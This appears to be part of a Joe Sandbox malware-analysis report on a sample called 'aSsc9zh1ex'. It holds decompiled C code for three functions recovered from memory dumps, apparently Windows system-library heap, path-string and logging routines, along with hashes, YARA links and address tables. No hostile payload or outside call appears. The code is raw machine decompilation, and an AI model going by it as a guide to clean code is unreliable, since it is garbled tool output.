                                                                                                                              • Opcode Fuzzy Hash: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
                                                                                                                              • Instruction Fuzzy Hash: FD81AC74A00746AFCB15CF68C484BAABBF5FF48310F108A6EE955D7691D730EA40CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D80970B Relevance: .2, Instructions: 210COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E1D80970B(signed int __ecx, signed int __edx, signed int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				char* _t66;
				intOrPtr _t67;
				intOrPtr _t73;
				signed int _t81;
				signed int _t83;
				signed int _t86;
				signed int _t92;
				signed int _t94;
				void* _t95;
				signed int _t100;
				signed int _t107;
				signed int _t119;
				signed int _t121;
				signed int _t122;

				_t108 = __edx;
				_v8 =  *0x1d83b370 ^ _t122;
				_t120 = _a8;
				_t119 = __ecx;
				_t86 = ( *(__ecx + 0xc) | __edx) & 0x93000f0b;
				if(_a8 <= 0x7fffffff) {
					_t108 = __ecx;
					__eflags = E1D808435(__ecx + 0x18);
					if(__eflags == 0) {
						goto L1;
					}
					_t121 = _a4;
					_t108 = _t121;
					_v24 = _t121;
					_t62 = E1D809955(__ecx, _t121, __eflags, _t120, _t86,  &_v44);
					__eflags = _t62;
					if(_t62 == 0) {
						L48:
						__eflags = _t121;
						L49:
						return E1D784B50(_t121, _t86, _v8 ^ _t122, _t108, _t119, _t121);
					}
					__eflags = _v28 - _a8;
					if(_v28 < _a8) {
						goto L48;
					}
					_t108 = _v44;
					_t64 = 0;
					_v20 = _t108;
					__eflags = _a16;
					if(__eflags == 0) {
						_t92 = _a12;
						__eflags = _t92;
						if(_t92 != 0) {
							 *_t92 = _t108;
						}
						L13:
						__eflags = _t108 - _a8;
						if(_t108 == _a8) {
							L41:
							_t65 = E1D753C40();
							__eflags = _t65;
							if(_t65 == 0) {
								_t66 = 0x7ffe0380;
							} else {
								_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							__eflags =  *_t66;
							if( *_t66 != 0) {
								_t67 =  *[fs:0x30];
								__eflags =  *(_t67 + 0x240) & 0x00000001;
								if(( *(_t67 + 0x240) & 0x00000001) != 0) {
									__eflags = _t121;
									if(_t121 != 0) {
										_t108 = _t121;
										E1D7FF30A(_t119, _t121, _v24, _v44, _v32, 3);
									}
								}
							}
							goto L49;
						}
						_t94 = 0;
						_v16 = 0;
						__eflags = _t86 & 0x01000000;
						if((_t86 & 0x01000000) != 0) {
							L21:
							_t108 = _t86 & 0x12000001 | 0x01000000;
							_v12 = _t86 & 0x12000001 | 0x01000000;
							__eflags = _t121;
							if(__eflags != 0) {
								_t95 = 0;
								__eflags = 0;
								L25:
								__eflags = _t95 - 2;
								if(_t95 != 2) {
									__eflags = (_t95 + 2 << 7) + _t119;
									_t72 = E1D80D4C6((_t95 + 2 << 7) + _t119, _t108, _t121,  &_v44);
									L28:
									__eflags = _v16;
									_t121 = _t72;
									if(_v16 == 0) {
										L34:
										__eflags = _t121;
										if(_t121 == 0) {
											goto L49;
										}
										__eflags = _t121 - 0xffffffff;
										if(_t121 == 0xffffffff) {
											goto L49;
										}
										_t73 = _v32;
										__eflags = _t86 & 0x00000002;
										if((_t86 & 0x00000002) != 0) {
											_t100 = _v20;
											__eflags = _t73 - _t100;
											if(_t73 > _t100) {
												__eflags = _t73 - _t100;
												E1D788F40(_t100 + _t121, 0, _t73 - _t100);
												_t73 = _v32;
											}
										}
										__eflags = _t86 & 0x10000000;
										if((_t86 & 0x10000000) != 0) {
											 *((intOrPtr*)(_t73 + _t121)) = 0xabababab;
											 *((intOrPtr*)(_t73 + _t121 + 4)) = 0xabababab;
										}
										goto L41;
									}
									__eflags = _t121;
									if(__eflags == 0) {
										L32:
										_t72 = _v24;
										_v12 = _v24;
										L33:
										__eflags = E1D808565(_t119, _t72, __eflags, _t86, 0) + 8;
										_t108 = _t119;
										E1D7E78DE(_v16, _t119, _v12, 6, E1D808565(_t119, _t72, __eflags, _t86, 0) + 8);
										goto L34;
									}
									__eflags = _t121 - 0xffffffff;
									if(__eflags == 0) {
										goto L32;
									}
									_v12 = _t121;
									goto L33;
								}
								L26:
								_t108 = _v12;
								_t72 = E1D80A6C0(_t119, _v12, _t121,  &_v44);
								goto L28;
							}
							_push(_t94);
							_t81 = E1D80DE9F(_t86, 0x1d836dc8, (_t121 -  *0x1d836dc4 >> 0x14) + (_t121 -  *0x1d836dc4 >> 0x14), _t119, _t121, __eflags);
							__eflags = _t81;
							if(_t81 == 0) {
								goto L26;
							} else {
								_t108 = _v12;
								_t26 = _t81 - 1; // -1
								_t95 = _t26;
								goto L25;
							}
						}
						__eflags =  *(_t119 + 0x10);
						if( *(_t119 + 0x10) == 0) {
							goto L21;
						}
						__eflags = _t64;
						if(__eflags != 0) {
							L18:
							__eflags = _t64 - 0xffffffff;
							if(_t64 == 0xffffffff) {
								goto L21;
							}
							_t94 =  *(_t64 + 2) & 0xf;
							__eflags = _t94;
							_v16 = _t94;
							if(_t94 == 0) {
								goto L21;
							}
							_t108 = _t119;
							_t83 = E1D7E78DE(_t94, _t119, _t121, 5, _t64 + 8);
							__eflags = _t83;
							if(_t83 < 0) {
								goto L48;
							}
							goto L21;
						}
						_t94 = _t119;
						_t64 = E1D808565(_t94, _t121, __eflags, _t86, 0);
						__eflags = _t64;
						if(_t64 == 0) {
							goto L21;
						}
						goto L18;
					}
					_t64 = E1D808565(_t119, _t121, __eflags, _t86, _a12);
					__eflags = 0;
					if(0 == 0) {
						L9:
						_t107 = 0;
						__eflags = 0;
						L10:
						 *_a16 = _t107;
						_t108 = _v20;
						goto L13;
					}
					__eflags = 0 - 0xffffffff;
					if(0 == 0xffffffff) {
						goto L9;
					} else {
						_t107 =  *0x00000000 & 0x0000ffff;
						goto L10;
					}
				}
				L1:
				_t121 = 0;
				goto L49;
			}
































                                                                                                                              0x1d80970b
                                                                                                                              0x1d80971a
                                                                                                                              0x1d80971f
                                                                                                                              0x1d809723
                                                                                                                              0x1d80972a
                                                                                                                              0x1d809736
                                                                                                                              0x1d809742
                                                                                                                              0x1d80974c
                                                                                                                              0x1d80974e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d809758
                                                                                                                              0x1d80975b
                                                                                                                              0x1d80975d
                                                                                                                              0x1d809760
                                                                                                                              0x1d809765
                                                                                                                              0x1d809767
                                                                                                                              0x1d80993f
                                                                                                                              0x1d80993f
                                                                                                                              0x1d809942
                                                                                                                              0x1d809952
                                                                                                                              0x1d809952
                                                                                                                              0x1d809770
                                                                                                                              0x1d809773
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d809779
                                                                                                                              0x1d80977c
                                                                                                                              0x1d80977e
                                                                                                                              0x1d809781
                                                                                                                              0x1d809784
                                                                                                                              0x1d8097ae
                                                                                                                              0x1d8097b1
                                                                                                                              0x1d8097b3
                                                                                                                              0x1d8097b5
                                                                                                                              0x1d8097b5
                                                                                                                              0x1d8097b7
                                                                                                                              0x1d8097b7
                                                                                                                              0x1d8097ba
                                                                                                                              0x1d8098f3
                                                                                                                              0x1d8098f3
                                                                                                                              0x1d8098f8
                                                                                                                              0x1d8098fa
                                                                                                                              0x1d80990c
                                                                                                                              0x1d8098fc
                                                                                                                              0x1d809905
                                                                                                                              0x1d809905
                                                                                                                              0x1d809911
                                                                                                                              0x1d809914
                                                                                                                              0x1d809916
                                                                                                                              0x1d80991c
                                                                                                                              0x1d809923
                                                                                                                              0x1d809925
                                                                                                                              0x1d809927
                                                                                                                              0x1d80992e
                                                                                                                              0x1d809938
                                                                                                                              0x1d809938
                                                                                                                              0x1d809927
                                                                                                                              0x1d809923
                                                                                                                              0x00000000
                                                                                                                              0x1d809914
                                                                                                                              0x1d8097c0
                                                                                                                              0x1d8097c2
                                                                                                                              0x1d8097c5
                                                                                                                              0x1d8097cb
                                                                                                                              0x1d80980c
                                                                                                                              0x1d809814
                                                                                                                              0x1d80981a
                                                                                                                              0x1d80981d
                                                                                                                              0x1d809820
                                                                                                                              0x1d809846
                                                                                                                              0x1d809846
                                                                                                                              0x1d809848
                                                                                                                              0x1d809848
                                                                                                                              0x1d80984b
                                                                                                                              0x1d809869
                                                                                                                              0x1d80986b
                                                                                                                              0x1d809870
                                                                                                                              0x1d809870
                                                                                                                              0x1d809874
                                                                                                                              0x1d809876
                                                                                                                              0x1d8098ab
                                                                                                                              0x1d8098ab
                                                                                                                              0x1d8098ad
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8098b3
                                                                                                                              0x1d8098b6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8098bc
                                                                                                                              0x1d8098bf
                                                                                                                              0x1d8098c2
                                                                                                                              0x1d8098c4
                                                                                                                              0x1d8098c7
                                                                                                                              0x1d8098c9
                                                                                                                              0x1d8098cb
                                                                                                                              0x1d8098d4
                                                                                                                              0x1d8098d9
                                                                                                                              0x1d8098dc
                                                                                                                              0x1d8098c9
                                                                                                                              0x1d8098df
                                                                                                                              0x1d8098e5
                                                                                                                              0x1d8098ec
                                                                                                                              0x1d8098ef
                                                                                                                              0x1d8098ef
                                                                                                                              0x00000000
                                                                                                                              0x1d8098e5
                                                                                                                              0x1d809878
                                                                                                                              0x1d80987a
                                                                                                                              0x1d809886
                                                                                                                              0x1d809886
                                                                                                                              0x1d809889
                                                                                                                              0x1d80988c
                                                                                                                              0x1d80989b
                                                                                                                              0x1d8098a4
                                                                                                                              0x1d8098a6
                                                                                                                              0x00000000
                                                                                                                              0x1d8098a6
                                                                                                                              0x1d80987c
                                                                                                                              0x1d80987f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d809881
                                                                                                                              0x00000000
                                                                                                                              0x1d809881
                                                                                                                              0x1d80984d
                                                                                                                              0x1d80984d
                                                                                                                              0x1d809857
                                                                                                                              0x00000000
                                                                                                                              0x1d809857
                                                                                                                              0x1d80982d
                                                                                                                              0x1d809835
                                                                                                                              0x1d80983a
                                                                                                                              0x1d80983c
                                                                                                                              0x00000000
                                                                                                                              0x1d80983e
                                                                                                                              0x1d80983e
                                                                                                                              0x1d809841
                                                                                                                              0x1d809841
                                                                                                                              0x00000000
                                                                                                                              0x1d809841
                                                                                                                              0x1d80983c
                                                                                                                              0x1d8097cd
                                                                                                                              0x1d8097d0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8097d2
                                                                                                                              0x1d8097d4
                                                                                                                              0x1d8097e5
                                                                                                                              0x1d8097e5
                                                                                                                              0x1d8097e8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8097ee
                                                                                                                              0x1d8097ee
                                                                                                                              0x1d8097f1
                                                                                                                              0x1d8097f4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8097f9
                                                                                                                              0x1d8097ff
                                                                                                                              0x1d809804
                                                                                                                              0x1d809806
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d809806
                                                                                                                              0x1d8097da
                                                                                                                              0x1d8097dc
                                                                                                                              0x1d8097e1
                                                                                                                              0x1d8097e3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8097e3
                                                                                                                              0x1d80978e
                                                                                                                              0x1d809793
                                                                                                                              0x1d809795
                                                                                                                              0x1d8097a1
                                                                                                                              0x1d8097a1
                                                                                                                              0x1d8097a1
                                                                                                                              0x1d8097a3
                                                                                                                              0x1d8097a6
                                                                                                                              0x1d8097a9
                                                                                                                              0x00000000
                                                                                                                              0x1d8097a9
                                                                                                                              0x1d809797
                                                                                                                              0x1d80979a
                                                                                                                              0x00000000
                                                                                                                              0x1d80979c
                                                                                                                              0x1d80979c
                                                                                                                              0x00000000
                                                                                                                              0x1d80979c
                                                                                                                              0x1d80979a
                                                                                                                              0x1d809738
                                                                                                                              0x1d809738
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 63243993f5b02b60d7f32175fdbde1636ed60fbd90512ed0df53219632feaacb
                                                                                                                              • Instruction ID: 295f325c55cf27dc99b864bbb027431c852b4018d031b38869af0d4296ed81f9
                                                                                                                              • Opcode Fuzzy Hash: 63243993f5b02b60d7f32175fdbde1636ed60fbd90512ed0df53219632feaacb
                                                                                                                              • Instruction Fuzzy Hash: A961D471F002199BDB15EF69CC80BBE77AAAF84720F198259F92197390DB30D941C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7F550D Relevance: .2, Instructions: 204COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D7F550D(signed int __ecx, signed short* __edx, signed int _a4, signed int _a8, signed int* _a12, signed int* _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _t70;
				void* _t80;
				signed int _t81;
				signed int _t96;
				signed int _t100;
				signed int _t113;
				signed int _t126;
				signed int _t127;
				signed int _t130;
				signed int _t133;
				signed int _t134;
				signed int* _t139;
				signed int _t140;
				signed short* _t141;
				signed int _t142;
				signed int _t144;

				_t141 = __edx;
				_t113 = __ecx;
				if(__edx == 0) {
					L45:
					return 0xc000000d;
				}
				_t139 = _a12;
				if(_t139 == 0 ||  *_t139 < 0) {
					goto L45;
				}
				_t130 = _a4;
				if(_t130 < 0xffffffff ||  *_t139 > 0 && _a8 == 0 || (_t113 & 0xfffffff0) != 0) {
					goto L45;
				}
				if(_t130 == 0xffffffff) {
					if(E1D76418E(_t141, 0x203,  &_v24) < 0) {
						L22:
						return 0xc0000716;
					}
					_t130 = _v24 + 1;
				}
				_t70 =  *(_t141 + _t130 * 2 - 2) & 0x0000ffff;
				_v16 = _t70;
				if(_t70 == 0) {
					_t130 = _t130 - 1;
				}
				_v12 = 0x1ff;
				_v24 = _t113 & 0x00000004;
				_t80 = E1D7F5818(_t141, _t130, _a16,  &_v12, (_t113 >> 0x00000001 & 0 | (_t113 & 0x00000004) != 0x00000000) & 0x000000ff, _t113 >> 0x00000001 & 1,  &_v6,  &_v20);
				if(_t80 >= 0) {
					_t81 = _v16;
					_t142 = _v12;
					if(_t81 != 0) {
						_t123 = _a16;
						L17:
						if((_t113 & 0x00000008) != 0 || _v6 != 0) {
							L39:
							__eflags = _a8;
							if(_a8 == 0) {
								L44:
								 *_t139 = _t142;
								return 0;
							}
							__eflags =  *_t139;
							if( *_t139 == 0) {
								goto L44;
							}
							__eflags = _t142 -  *_t139;
							if(_t142 <=  *_t139) {
								E1D7888C0(_a8, _a16, _t142 + _t142);
								goto L44;
							}
							return 0xc0000023;
						} else {
							if(_v24 == 0) {
								L24:
								_t133 = _v20 - _a16 >> 1;
								__eflags = _t81;
								_t125 = 0 | __eflags == 0x00000000;
								if(__eflags >= 0) {
									goto L39;
								}
								__eflags = _v16;
								_t144 = _t142 - (0 | _v16 == 0x00000000) + 1 - _t133;
								_v16 = _v20 + 2;
								_t140 = E1D755D90(_t125,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t144);
								__eflags = _t140;
								if(_t140 != 0) {
									_t134 = _v16;
									_t126 = 0;
									__eflags = _t144;
									if(_t144 <= 0) {
										L31:
										_t96 = E1D7F8700(_t126, (( !_t113 & 0x00000001) << 8) + 0xd, _t134, _t144,  &_v5);
										__eflags = _t96;
										if(_t96 >= 0) {
											__eflags = _v5;
											if(_v5 == 0) {
												goto L32;
											}
											_t100 = 0;
											__eflags = _t144;
											if(_t144 <= 0) {
												L38:
												E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t140);
												_t142 = _v12;
												_t139 = _a12;
												goto L39;
											} else {
												goto L35;
											}
											do {
												L35:
												__eflags =  *((char*)(_t100 + _t140)) - 1;
												if( *((char*)(_t100 + _t140)) == 1) {
													_t127 = _v16;
													_t58 = _t127 + _t100 * 2;
													 *_t58 =  *(_t127 + _t100 * 2) + 0xffe0;
													__eflags =  *_t58;
												}
												_t100 = _t100 + 1;
												__eflags = _t100 - _t144;
											} while (_t100 < _t144);
											goto L38;
										}
										L32:
										E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t140);
										goto L22;
									} else {
										goto L28;
									}
									do {
										L28:
										__eflags = ( *(_t134 + _t126 * 2) & 0x0000ffff) + 0xffffffbf - 0x19;
										if(( *(_t134 + _t126 * 2) & 0x0000ffff) + 0xffffffbf <= 0x19) {
											_t48 = _t134 + _t126 * 2;
											 *_t48 =  *(_t134 + _t126 * 2) + 0x20;
											__eflags =  *_t48;
											 *((char*)(_t126 + _t140)) = 1;
										}
										_t126 = _t126 + 1;
										__eflags = _t126 - _t144;
									} while (_t126 < _t144);
									goto L31;
								}
								return 0xc0000017;
							}
							if(E1D7F8700(_t123, 1, _t123, _v20 - _t123 >> 1,  &_v5) < 0 || _v5 == 0) {
								goto L22;
							} else {
								_t81 = _v16;
								goto L24;
							}
						}
					}
					if(_t142 >= 0x1ff) {
						goto L22;
					}
					_t123 = _a16;
					 *((short*)(_a16 + _t142 * 2)) = 0;
					_t142 = _t142 + 1;
					_v12 = _t142;
					goto L17;
				}
				return _t80;
			}

























                                                                                                                              0x1d7f5517
                                                                                                                              0x1d7f5519
                                                                                                                              0x1d7f551e
                                                                                                                              0x1d7f574a
                                                                                                                              0x00000000
                                                                                                                              0x1d7f574a
                                                                                                                              0x1d7f5524
                                                                                                                              0x1d7f5529
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5538
                                                                                                                              0x1d7f553e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5562
                                                                                                                              0x1d7f5576
                                                                                                                              0x1d7f562c
                                                                                                                              0x00000000
                                                                                                                              0x1d7f562c
                                                                                                                              0x1d7f557f
                                                                                                                              0x1d7f557f
                                                                                                                              0x1d7f5580
                                                                                                                              0x1d7f5587
                                                                                                                              0x1d7f558d
                                                                                                                              0x1d7f558f
                                                                                                                              0x1d7f558f
                                                                                                                              0x1d7f5593
                                                                                                                              0x1d7f55aa
                                                                                                                              0x1d7f55c3
                                                                                                                              0x1d7f55ca
                                                                                                                              0x1d7f55d0
                                                                                                                              0x1d7f55d3
                                                                                                                              0x1d7f55d9
                                                                                                                              0x1d7f55f2
                                                                                                                              0x1d7f55f5
                                                                                                                              0x1d7f55f8
                                                                                                                              0x1d7f571c
                                                                                                                              0x1d7f571c
                                                                                                                              0x1d7f5720
                                                                                                                              0x1d7f5744
                                                                                                                              0x1d7f5744
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5746
                                                                                                                              0x1d7f5722
                                                                                                                              0x1d7f5725
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5727
                                                                                                                              0x1d7f5729
                                                                                                                              0x1d7f573c
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5741
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5608
                                                                                                                              0x1d7f560c
                                                                                                                              0x1d7f5639
                                                                                                                              0x1d7f5641
                                                                                                                              0x1d7f5643
                                                                                                                              0x1d7f5648
                                                                                                                              0x1d7f564f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5657
                                                                                                                              0x1d7f5667
                                                                                                                              0x1d7f5669
                                                                                                                              0x1d7f567d
                                                                                                                              0x1d7f567f
                                                                                                                              0x1d7f5681
                                                                                                                              0x1d7f568d
                                                                                                                              0x1d7f5690
                                                                                                                              0x1d7f5692
                                                                                                                              0x1d7f5694
                                                                                                                              0x1d7f56b1
                                                                                                                              0x1d7f56c3
                                                                                                                              0x1d7f56c8
                                                                                                                              0x1d7f56ca
                                                                                                                              0x1d7f56e2
                                                                                                                              0x1d7f56e6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f56e8
                                                                                                                              0x1d7f56ea
                                                                                                                              0x1d7f56ec
                                                                                                                              0x1d7f5705
                                                                                                                              0x1d7f5711
                                                                                                                              0x1d7f5716
                                                                                                                              0x1d7f5719
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f56ee
                                                                                                                              0x1d7f56ee
                                                                                                                              0x1d7f56ee
                                                                                                                              0x1d7f56f2
                                                                                                                              0x1d7f56f4
                                                                                                                              0x1d7f56fc
                                                                                                                              0x1d7f56fc
                                                                                                                              0x1d7f56fc
                                                                                                                              0x1d7f56fc
                                                                                                                              0x1d7f5700
                                                                                                                              0x1d7f5701
                                                                                                                              0x1d7f5701
                                                                                                                              0x00000000
                                                                                                                              0x1d7f56ee
                                                                                                                              0x1d7f56cc
                                                                                                                              0x1d7f56d8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5696
                                                                                                                              0x1d7f5696
                                                                                                                              0x1d7f569d
                                                                                                                              0x1d7f56a1
                                                                                                                              0x1d7f56a3
                                                                                                                              0x1d7f56a3
                                                                                                                              0x1d7f56a3
                                                                                                                              0x1d7f56a8
                                                                                                                              0x1d7f56a8
                                                                                                                              0x1d7f56ac
                                                                                                                              0x1d7f56ad
                                                                                                                              0x1d7f56ad
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5696
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5683
                                                                                                                              0x1d7f5624
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5636
                                                                                                                              0x1d7f5636
                                                                                                                              0x00000000
                                                                                                                              0x1d7f5636
                                                                                                                              0x1d7f5624
                                                                                                                              0x1d7f55f8
                                                                                                                              0x1d7f55e1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f55e3
                                                                                                                              0x1d7f55e8
                                                                                                                              0x1d7f55ec
                                                                                                                              0x1d7f55ed
                                                                                                                              0x00000000
                                                                                                                              0x1d7f55ed
                                                                                                                              0x1d7f5753

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ed7525d71640319b55b6c00dcff0c5943775fed9389e0ec81df694f1686d9efe
                                                                                                                              • Instruction ID: 5c66075f5e0d45342d92a905914c303e97173ed270729d1538696fa55fab7973
                                                                                                                              • Opcode Fuzzy Hash: ed7525d71640319b55b6c00dcff0c5943775fed9389e0ec81df694f1686d9efe
                                                                                                                              • Instruction Fuzzy Hash: ED61F675A0425AEBDB218F68C840BAE77BAEF44734F114126E871E7390D774F941CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BFFDC Relevance: .2, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 79%
                                                                                                                              			E1D7BFFDC(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = E1D755D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E1D7BFD65(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E1D753C40();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E1D782F90();
					_t87 = E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E1D7C0DCB( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E1D7C0DCB( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E1D7C0DCB( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E1D7C0DCB( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = E1D755D90( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E1D7BFD65( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E1D7BFD65( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E1D7BFD65( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E1D7BFD65( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E1D753C40() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E1D782F90();
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = E1D753B90( &_v36);
							if(_v24 >= 0) {
								_t87 = E1D753B90( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = E1D753B90( &_v52);
							}
							if(_v28 >= 0) {
								return E1D753B90( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                                              0x1d7bffe7
                                                                                                                              0x1d7bfff1
                                                                                                                              0x1d7bfff4
                                                                                                                              0x1d7bfff6
                                                                                                                              0x1d7bfff9
                                                                                                                              0x1d7bfffc
                                                                                                                              0x1d7bffff
                                                                                                                              0x1d7c0002
                                                                                                                              0x1d7c0005
                                                                                                                              0x1d7c0008
                                                                                                                              0x1d7c0011
                                                                                                                              0x1d7c0017
                                                                                                                              0x1d7c001c
                                                                                                                              0x1d7c0020
                                                                                                                              0x1d7c002b
                                                                                                                              0x1d7c002e
                                                                                                                              0x1d7c0035
                                                                                                                              0x1d7c0040
                                                                                                                              0x1d7c0043
                                                                                                                              0x1d7c0049
                                                                                                                              0x1d7c0055
                                                                                                                              0x1d7c0060
                                                                                                                              0x1d7c0063
                                                                                                                              0x1d7c0068
                                                                                                                              0x1d7c006f
                                                                                                                              0x1d7c0081
                                                                                                                              0x1d7c0071
                                                                                                                              0x1d7c007a
                                                                                                                              0x1d7c007a
                                                                                                                              0x1d7c0086
                                                                                                                              0x1d7c0087
                                                                                                                              0x1d7c008a
